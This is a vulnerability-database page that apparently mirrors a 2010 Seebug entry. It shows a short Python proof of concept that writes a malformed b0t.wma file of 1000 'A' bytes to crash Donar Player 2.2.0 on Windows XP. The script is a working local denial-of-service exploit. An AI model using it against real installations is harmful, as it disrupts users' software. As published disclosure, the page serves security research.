Lucene search
K

Donar Player 2.2.0 - Local Crash PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 13 Views

Donar Player 2.2.0 Local Crash PoC 03-21-2010 b0telh0 Windows XP SP

Code

                                                #!/usr/bin/python
#
# Title: Donar Player 2.2.0 Local Crash PoC
# Date: 03-21-2010
# Author: b0telh0
# Link: http://www.donarzone.com/downloads/donar-player-setup-free.exe
# Tested on: Windows XP SP3


crash = "\x41" * 1000

try:
     file = open('b0t.wma','w');
     file.write(crash);
     file.close();
     print "\n[+] b0t.wma created."
     print "[+] File > Music Library > Add Files..."
     print "[+] Open b0t.wma and play it.\n"
except:
     print "\n[-] Error.. Can't write file to system.\n"

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation